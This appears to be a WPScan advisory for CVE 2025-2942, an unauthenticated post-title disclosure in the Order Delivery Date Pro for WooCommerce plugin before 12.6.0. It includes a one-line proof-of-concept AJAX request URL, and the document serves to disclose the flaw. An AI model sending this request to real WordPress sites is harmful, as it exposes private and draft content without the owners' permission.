Order Delivery Date Pro for WooCommerce < 12.6.0 – Unauthenticated Arbitrary Post Title Disclosure | CVE 2025-2942 | Plugin Vulnerabilities

Description

The plugin discloses arbitrary post title (such as from draft and private posts) via an unauthenticated AJAX action, allowing attackers to retrieve such information

Proof of Concept

As unauthenticated, open the URL below:

http://example.com/wp-admin/admin-ajax.php?action=orddd_order_calendar_content&order_id=<valid-order-ID>&event_value=a&event_type=order&event_product_id=<arbitrary-post-id>

Affects Plugins

order-delivery-date

Fixed in 12.6.0

References

CVE

Classification

Type

SENSITIVE DATA DISCLOSURE

OWASP top 10

A3: Sensitive Data Exposure

CWE

CVSS

Miscellaneous

Original Researcher

Erwan LR (WPScan)

Submitter

Erwan LR (WPScan)

Verified

Yes

WPVDB ID

13a87567-2cf7-4bfb-8d63-a8e74950978f

Timeline

Publicly Published

2025-06-20 (about 6 months ago)

Added

2025-06-20 (about 6 months ago)

Last Updated

2025-06-20 (about 6 months ago)

Other

Published

Title

Published

2025-03-27

Title

Booking for Appointments and Events Calendar – Amelia < 1.2.20 - Unauthenticated Full Path Disclosure

Published

2024-04-05

Title

User Spam Remover < 1.1 - Unauthenticated Sensitive Information Exposure

Published

2024-03-21

Title

LiquidPoll – Polls, Surveys, NPS and Feedback Reviews < 3.3.77 - Information Exposure

Published

2025-01-16

Title

Moving Users < 1.10 - Unauthenticated Sensitive Information Exposure

Published

2024-02-02

Title

LearnDash LMS < 4.10.3 - Sensitive Information Exposure via API